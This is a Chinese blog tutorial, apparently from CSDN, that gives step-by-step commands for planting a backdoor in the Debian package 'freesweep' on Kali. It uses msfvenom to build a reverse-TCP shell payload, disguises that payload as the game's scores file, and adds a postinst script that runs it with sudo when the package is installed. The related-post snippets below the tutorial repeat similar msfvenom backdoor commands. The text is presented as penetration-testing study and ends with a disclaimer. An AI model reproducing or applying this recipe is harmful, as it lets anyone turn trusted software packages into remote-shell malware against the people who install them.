制作恶意deb软件包linux系统触发后门

已于 2022-02-27 00:37:40 修改
阅读量2.1k 收藏 8
点赞数 2
分类专栏: kali学习 文章标签: linux 安全 运维
于 2022-02-27 00:35:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao_he0123/article/details/123158460
版权

文章目录

前言

通过kali系统中的msf在软件包中植入后门制作deb恶意软件包对linux系统进行shell获取

提示:以下是本篇文章正文内容,下面案例可供参考

一、kali

示例:Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.用户可通过硬盘、live CD或live USB运行Kali Linux,并通过kali过一把黑客的瘾

二、操作步骤

1.下载一个正常的软件包

代码如下(示例):

apt --download-only install freesweap(或者其他软件名)

在这里插入图片描述
默认下载目录为/var/cache/apt/archives/

2.将软件包转移到root目录下

代码如下(示例):

mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb /root/

3.将安装包解压到root目录中解压为free(文件名)

dpkg -x freesweep_1.0.2-1_amd64.deb free
#这里可能遇到显示文件名不存在可以通过:
ls /var/cache/apt/archives中查看你的文件名进行复制粘贴(复制粘贴按键为crtl+shift+c/v)

在这里插入图片描述

4.制作后门放入free文件中

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.124.3 LPORT=4444 -b'\x00' -i 10 -f elf -o /root/free/usr/games/freesweep_scores
#此处LHOST根据自己的kali的ip设置
#之后可以通过ls /root.free.usr/games查看是否由freesweep_scores来确定是否生成成功

在这里插入图片描述

5.创建DEBIAN附件并进入

mkdir free/DEBIAN && cd free/DEBIAN

6.创建软件包信息

tee /root/free/DEBIAN/control << 'EOF'
#<<'EOF'表示开始
Package: freesweep
Version: 1.0.2-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game,where one tries to find all the mines without igniting any,based on hints given by the computer.Unlike most implementations of this game,Freesweep works in any visual text display -in Linux console,in an xterm,and in most text-based terminals currently in use
EOF
#第二个EOF表示结束

在这里插入图片描述

7.创建deb软件包安装脚本后门

tee /root/free/DEBIAN/postinst << 'EOF' 
sudo chomd 755 /usr/games/freesweep_scores
sudo /usr/games/freesweep_scores &
EOF

在这里插入图片描述

8.给脚本执行权限

chmod +775 /root/free/DEBIAN/postinst
#通过ls -l !$验证是否权限给予成功
#若如下图一样出现绿色的文件则代表成功

9.构建新的deb安装包

dpkg-deb --build /root/free/

10.开启handler监听在linux安装该软件包

#开启handler监听可以参考上一篇博文
dpkg -i free.deb进行安装
#dpkg -r freesweap可以进行卸载

三.总结

总结:
以上就是制作恶意deb安装包进行linux的入侵,学习之后希望大家可以提升自己做一名白帽子
声明:本文仅传授知识,读者读后所作造成后果于本人无关

just a leaf
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Msfvenom制作deb软件包生成后门
Dreamsi_zhang的博客
08-13 644
一、下载正常软件包 apt --download-only install freesweep //下载但不安装软件包freesweep 二、复制到root用户加目录下 为了便于后续操作,复制该软件包到root用户加目录下 默认apt下载后软件包位置路径为:/var/cache/apt/archives/ 四、解压软件包deb包解压 五、生成恶意代码到软件源文件中 msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tc
制作恶意deb软件包触发后门
2301_76737000的博客
03-13 670
攻击机:Kali靶机:Ubuntu。
2022-渗透测试-制作恶意deb软件包触发后门
保持微笑的博客
01-19 2169
目录 1.下载软件包 2.解压软件包 小知识1:kali更新或安装包的目录 小知识2:kali解压或安装操作 3.生成恶意代码到软件包文件中 4.创建软件包信息目录 5.重新生成一个软件包 6 将deb提供下载 7 启动msfconsole 8.配置监听 10 目标机下载并安装带木马的deb软件 11.目标机安装软件 12 监控端获取到session 1.下载软件包 kali安装软件包 apt install 软件名称 kali下载软件包 apt --down..
使用MSF-msfvenom制作恶意 deb 软件包触发后门
枫梓林のBlog
04-21 544
使用MSF-msfvenom制作恶意 deb 软件包触发后门 文章目录使用MSF-msfvenom制作恶意 deb 软件包触发后门 实验环境 Kali Linux 2019.1a Kali Linux 2020.4 1.制作恶意软件包 制作恶意软件包使用 --download-only 方式下载软件包不进行安装 注:freeweep root@fengzilin53:~# apt --download-only install -y freesweep root@fengzilin53:~# m
Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门
Fly_鹏程万里
05-16 1725
WeBaCooWeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端。WeBaCoo有两种工作模式:Generation(生产线模式):指定-g选项可进入这种模式。用户可以在这种模式下制作PHP代码的payloadTerminal(终端模式):指定-t选项可进入这种模式,用户可以在这种模式下连接到被...
制作windows和linux客户端恶意软件进行渗透
m0_47510703的博客
01-23 3490
一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序 msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
msf制作恶意deb软件包触发后门
Deeeelete的博客
02-25 990
攻击机:192.168.132.144(kali1) 手害机:192.168.132.133(kali2) 本该是由攻击机生成恶意deb包,然后把包发给受害机让它访问然后监听的,但因为中间有一个包传递的过程,我就直接省略这一步直接在受害机里生成了,但监听地址是填写的攻击机。 1.第一步我们先下载所需的freesweep软件包(这里使用的是kali2) apt --download-only in...
linux制作一个简单的deb安装包
02-13
学习在Ubuntu22.04下制作一个简单的deb安装包,项目包括一个简单的c源码编写,编码编译,文件目录制作,control文件制作,dbpk工具制作安装包,测试。
QPM-linux-deb软件包+依赖库
07-23
【QPM-linux-deb软件包+依赖库】是专为Linux环境设计的,特别是针对Qualcomm平台的Hexagon架构进行优化的软件包管理工具。这个软件包包含了Qualcomm Package Manager (QPM) 的版本2.0.21.1,它是Qualcomm公司提供的...
Ubuntu下的deb制作详解
08-03
Linux 系统中,deb 包是最常用的软件包格式之一,ubuntu 作为 Linux 发行版之一,deb 包的制作和使用是非常重要的。本文将详细介绍如何使用 QT 程序制作 deb 包,并安装到应用程序菜单中。 deb 包的制作主要可以...
linux-Debian/Ubunutu常用软件包(.deb)
10-30
Linux系统,特别是Debian和Ubuntu家族,广泛使用.deb软件包作为其主要的软件分发格式。这些软件包包含了预编译的程序、依赖关系、配置文件以及安装和卸载脚本,使得用户能够方便地管理和更新系统中的应用程序。 ...
debins:一个简单的一键式.Deb软件包安装程序
02-05
"debins" 是一个专为简化.Deb软件包安装过程而设计的工具,它使得在Linux系统中,尤其是Debian及其衍生发行版(如Ubuntu、Linux Mint等)上安装.Deb文件变得更为便捷。"一键式"意味着用户只需要执行一个命令或者点击...
MSF实战制作deb软件包后门
永远是少年
06-13 435
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件包后门。 一、deb恶意软件包制作 二、效果检验
偷梁换柱“Windows 11安装包”竟成了恶意程序?
qq_43529978的博客
02-15 6082
真假难辨的Windows 11网站
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
KaLi做木马渗透实战案例
开摆工作室(kbai.cc)
04-04 4766
KaLi做木马渗透实战案例
网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
weixin_46035615的博客
04-21 5360
制作 windows 和 linux 客户端恶意软件进行渗透(拿到权限后开启屏幕共享 开启摄像头等等)
利用deb包-0day-java环境-安卓客户端进行渗透
Q先生
07-20 1082
利用deb包-0day-java环境-安卓客户端进行渗透 1 制作恶意deb软件包触发后门 制作恶意deb软件来触发后门一共分3步 下载软件包 解包 植入后门 1.1 下载软件包 apt install --download-only freesweep cp /var/cache/apt/archives/freesweep_1.0.1-1_amd64.deb ./ 1.2 解压包 dpkg -x freesweep_1.0.1-1_amd64.deb free cd free 1.
Linux】进程间通信(IPC)——匿名管道
最新发布
2201_76024104的博客
07-08 1165
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
linux安装deb软件包
09-01
要在Linux上安装.deb软件包,可以按照以下步骤进行操作: 1. 打开终端,使用管理员权限登录或切换到root用户。 2. 使用以下命令进入.deb软件包所在的目录: ``` cd /path/to/package/directory ``` 3. 运行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值